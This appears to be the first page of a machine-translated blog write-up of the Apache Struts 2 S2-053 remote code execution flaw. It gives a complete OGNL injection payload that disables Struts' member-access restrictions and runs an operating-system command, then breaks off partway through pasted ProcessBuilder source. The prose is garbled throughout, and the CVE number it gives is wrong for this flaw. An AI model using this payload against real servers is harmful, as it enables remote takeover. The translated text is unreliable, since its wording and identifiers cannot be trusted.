Struts 2 S2-053 flaws vulnerability bug thematic research with the POC-the exploit-warning-the black bar safety net

Flaws vulnerability bug overview

Flaws vulnerability bug example

Long distance code to fulfil flaws vulnerability bug

CVE-ID

CVE-2017-1000112

Persecution of the grade

High-risk

Impact version

Struts 2.0.1 Struts 2.3.33 Struts 2.5 – Struts 2.5.10

Flaws vulnerability bug persecution

When the developer in the Freemarker tags in applications the following code when<@s. hidden name=”redirectUri” value=redirectUri /><@s. hidden name=”redirectUri” value=”${redirectUri}” />Freemarker will be a value when the expression stops fulfill, at last incurred the code to fulfill.

poc example

%{(#[email protected]@DEFAULT_MEMBER_ACCESS). (#_memberAccess? (#_memberAccess=#dm):((#container=#context[‘com. opensymphony. xwork2. ActionContext. container’]). (#ognlUtil=#container. getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil. getExcludedPackageNames(). clear()). (#ognlUtil. getExcludedClasses(). clear()). (#context. setMemberAccess(#dm)))). (#cmd=‘/usr/bin/touch /tmp/vuln’). (#iswin=(@java.lang.System@getProperty(‘os. name’). toLowerCase(). contains(‘win’))). (#cmds=(#iswin? {‘cmd.exe’,‘/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})). (#p=new java. lang. ProcessBuilder(#cmds)). (#p. redirectErrorStream(true)). (#process=#p. start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse(). getOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process. getInputStream(),#ros)). (#ros. flush())}
poc debugging

A brief browse of the poc, in accordance with the usual practice, the Breakpoints hit in the ProcessBuilder class start()way

//the java. lang. ProcessBuilder
public Process start() throws IOException {
// Must convert to array first – a malicious user-supplied
// list might try to circumvent the security check.
String[] cmdarray = command. toArray(new String[command. size()]);
cmdarray = cmdarray. clone();
for (String arg : cmdarray)
if (arg == null)
throw new NullPointerException();
// Throws IndexOutOfBoundsException if command is empty
String prog = cmdarray[0];
SecurityManager security = System. getSecurityManager();
if (security != null)
security. checkExec(prog);
String dir = directory == null ? null : directory. toString();
for (int i = 1; i < cmdarray. length; i++) {
if (cmdarray[i]. indexOf(‘\u0000’) >= 0) {
throw new IOException(“invalid null character in command”);
}
}
try {
return ProcessImpl. start(cmdarray,
environment,
dir,
redirects,
redirectErrorStream);
} catch (IOException | IllegalArgumentException e) {
String exceptionInfo = ": "+ e. getMessage();
Throwable cause = e;
if ((e instanceof IOException) && amp; security != null) {
// Can not disclose the fail reason for read-protected files.
try {
security. checkRead(prog);

[1] [2] [3] [4] [5] next